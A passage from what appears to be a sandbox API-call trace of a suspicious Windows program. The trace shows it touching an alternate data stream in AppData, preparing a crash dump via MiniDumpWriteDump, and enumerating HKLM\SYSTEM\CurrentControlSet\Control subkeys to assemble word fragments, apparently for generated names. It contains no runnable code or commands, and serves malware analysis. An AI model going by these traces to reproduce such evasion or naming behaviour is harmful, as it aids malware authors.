HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin")) returned 0x36 [0030.433] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin", lpEnd=0x0, wMatch=0x5c) returned="\\Pipe:bin" [0030.433] lstrlenW (lpString="Pipe:bin") returned 8 [0030.433] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359480 [0030.433] PathFindExtensionW (pszPath="Pipe:bin") returned="" [0030.433] StrChrW (lpStart="Pipe:bin", wMatch=0x3a) returned=":bin" [0030.433] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0030.436] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0030.436] lstrlenW (lpString="Pipe") returned 4 [0030.436] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0030.436] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x5e) returned 0x3594a0 [0030.436] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x3594a0, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0030.436] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Pipe" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe" [0030.436] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp" [0030.436] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Pipe.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\pipe.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0030.437] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0030.437] SetEndOfFile (hFile=0x94) returned 1 [0030.437] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x100416a) returned 0x0 [0030.438] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0030.438] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0030.438] lstrlenW (lpString="ACPI") returned 4 [0030.438] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359508 [0030.438] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0030.438] lstrlenW (lpString="AGP") returned 3 [0030.438] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359528 [0030.438] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0030.438] lstrlenW (lpString="AppID") returned 5 [0030.438] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359548 [0030.438] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359b78 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0030.440] lstrlenW (lpString="Arbiters") returned 8 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354158 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0030.440] lstrlenW (lpString="BackupRestore") returned 13 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354180 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x3541a8 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0030.440] lstrlenW (lpString="Class") returned 5 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359b98 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0030.440] lstrlenW (lpString="CMF") returned 3 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359bb8 [0030.440] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0030.440] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0030.440] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359bd8 [0030.440] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x3541d0 [0030.440] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.440] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x22) returned 0x359bf8 [0030.440] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0030.441] lstrlenW (lpString="COM Name Arbiter") returned 16 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359c28 [0030.441] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0030.441] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0030.441] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359c48 [0030.441] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x3541f8 [0030.441] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0030.441] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0030.441] lstrlenW (lpString="ComputerName") returned 12 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354220 [0030.441] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359c68 [0030.441] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0030.441] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0030.441] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359c68 | out: hHeap=0x340000) returned 1 [0030.441] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0030.441] lstrlenW (lpString="ContentIndex") returned 12 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x354248 [0030.441] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0030.441] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359c68 [0030.441] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0030.441] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0030.441] lstrlenW (lpString="CrashControl") returned 12 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359c88 [0030.441] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0030.441] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0030.441] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x354270 [0030.442] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0030.442] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0030.442] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0030.442] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0030.442] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354298 [0030.442] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0030.442] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x3542c0 [0030.442] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.442] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.442] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3542c0 | out: hHeap=0x340000) returned 1 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x3542c0 [0030.442] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0030.442] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0030.442] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0030.442] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0030.442] lstrlenW (lpString="Cryptography") returned 12 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x26) returned 0x359ca8 [0030.442] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0030.442] lstrlenW (lpString="DeviceClasses") returned 13 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x3542e8 [0030.442] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.442] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.442] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x3542e8 | out: hHeap=0x340000) returned 1 [0030.442] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x3542e8 [0030.442] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0030.442] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0030.442] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0030.442] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0030.442] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0030.443] lstrlenW (lpString="DeviceOverrides") returned 15 [0030.443] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354310 [0030.443] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.443] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.443] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354310 | out: hHeap=0x340000) returned 1 [0030.443] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20) returned 0x354310 [0030.443] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0030.443] lstrlenW (lpString="Diagnostics") returned 11 [0030.443] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x24) returned 0x359cd8 [0030.443] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0030.443] lstrlenW (lpString="Els") returned 3 [0030.443] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359d20 [0030.443] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0030.443] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0030.443] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0030.443] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0030.443] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0030.443] lstrlenW (lpString="Errata") returned 6 [0030.443] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354338 [0030.443] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0030.443] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0030.443] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0030.444] lstrlenW (lpString="FileSystem") returned 10 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359d40 [0030.444] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0030.444] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354360 [0030.444] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0030.444] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0030.444] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0030.444] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0030.444] lstrlenW (lpString="FileSystemUtilities") returned 19 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359d60 [0030.444] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0030.444] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0030.444] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0030.444] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359d60 | out: hHeap=0x340000) returned 1 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354388 [0030.444] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0030.444] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0030.444] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0030.444] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0030.444] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354388 | out: hHeap=0x340000) returned 1 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20) returned 0x354388 [0030.444] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0030.444] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0030.444] lstrlenW (lpString="GraphicsDrivers") returned 15 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x3543b0 [0030.444] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0030.444] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0030.444] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0030.444] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0030.444] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x3543d8 [0030.445] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0030.445] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0030.445] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0030.445] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0030.445] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0030.445] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0030.445] lstrlenW (lpString="GroupOrderList") returned 14 [0030.445] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359d60 [0030.445] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0030.445] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0030.445] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0030.445] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359d80 [0030.445] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0030.445] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0030.445] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0030.445] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0030.445] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359da0 [0030.445] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0030.445] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0030.445] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0030.445] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0030.445] lstrlenW (lpString="HAL") returned 3 [0030.445] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359dc0 [0030.445] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0030.445] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0030.445] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0030.445] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0030.445] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0030.445] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0030.445] lstrlenW (lpString="IDConfigDB") returned 10 [0030.445] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354400 [0030.445] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0030.446] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0030.446] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0030.446] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0030.446] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0030.446] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359de0 [0030.446] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0030.446] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0030.446] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0030.446] lstrlenW (lpString="Keyboard Layout") returned 15 [0030.446] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354428 [0030.446] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0030.446] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x354450 [0030.446] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0030.446] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0030.446] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0030.446] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0030.446] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0030.446] lstrlenW (lpString="Keyboard Layouts") returned 16 [0030.446] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x354478 [0030.446] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0030.446] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0030.446] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354478 | out: hHeap=0x340000) returned 1 [0030.447] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x354478 [0030.447] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0030.447] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0030.447] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0030.447] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0030.447] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0030.447] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0030.447] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0030.447] lstrlenW (lpString="Lsa") returned 3 [0030.447] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359e00 [0030.447] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.447] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0030.447] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0030.447] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359e20 [0030.447] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.447] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0030.448] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e20 | out: hHeap=0x340000) returned 1 [0030.448] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20) returned 0x3544a0 [0030.448] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0030.448] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0030.448] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x3544c8 [0030.448] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0030.448] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0030.448] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0030.448] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0030.448] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0030.448] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0030.448] lstrlenW (lpString="LsaInformation") returned 14 [0030.448] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359e20 [0030.448] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0030.448] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0030.448] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e20 | out: hHeap=0x340000) returned 1 [0030.448] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x24) returned 0x35a508 [0030.448] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0030.448] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0030.448] lstrlenW (lpString="MediaCategories") returned 15 [0030.448] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e20 [0030.448] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.448] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.448] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.448] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.449] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x22) returned 0x35a538 [0030.449] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0030.449] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0030.449] lstrlenW (lpString="MediaDRM") returned 8 [0030.449] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e40 [0030.449] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.449] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.449] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e40 | out: hHeap=0x340000) returned 1 [0030.449] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359e40 [0030.449] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0030.449] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0030.449] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0030.449] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0030.449] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0030.449] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0030.449] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0030.449] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0030.449] lstrlenW (lpString="MediaInterfaces") returned 15 [0030.449] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e60 [0030.449] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.449] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.449] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.449] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e60 | out: hHeap=0x340000) returned 1 [0030.449] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x22) returned 0x35a568 [0030.450] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0030.450] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0030.450] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0030.450] lstrlenW (lpString="MediaProperties") returned 15 [0030.450] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e60 [0030.450] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.450] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.450] HeapFree (in: hHeap=0x340000, 